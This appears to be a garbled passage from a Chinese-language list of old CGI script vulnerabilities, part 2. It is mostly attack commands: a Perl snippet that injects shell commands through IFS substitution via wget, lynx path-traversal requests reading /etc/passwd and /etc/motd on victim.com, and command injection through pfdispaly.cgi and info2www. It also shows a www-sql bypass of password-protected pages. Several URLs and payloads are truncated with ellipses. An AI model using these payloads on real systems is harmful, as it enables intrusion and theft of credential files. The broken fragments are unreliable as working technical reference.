|
CGI漏洞(2) }$text="${URL}/;IFS=\8;${CMD};echo";$text =~ s/ /\$\{IFS\}/g;#print "$text\n";
system({"wget"} "wget", $text, "-O/dev/null";
system({"wget"} "wget", $text, "-O/dev/null";
#system({"lynx"} "lynx", $text); #如果没有wget命令也可以用lynx
#system({"lynx"} "lynx", $text); 六. 一些版本(1.1)的info2www的漏洞
$ REQUEST_METHOD=GET ./info2www ‘(../../../../../../../bin/mail jami $
You have new mail.
$ 说实在我不太明白. 七. pfdispaly.cgi lynx -source \
 http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd‘ pfdisplay.cgi还有另外一个漏洞可以执行命令 lynx -dump http://www.victim.com/cgi-bin/pfdispaly.cg...me%20-a‘
or
lynx -dump \
http://victim/cgi-bin/pfdispaly.cgi?‘%0A/...vil:0.0‘ 八. wrap lynx http://www.victim.com/cgi-bin/wrap?/../../../../../etc 九. www-sql
可以让你读一些受限制的页面如:
在你的浏览器里输入http://your.server/protected/something.html:
被要求输入帐号和口令.而有www-sql就不必了: http://your.server/cgi-bin/www-sql/protect...something.html: 十. view-source lynx http://www.victim.com/cgi-bin/vi ;... ../../../etc/passwd
| 
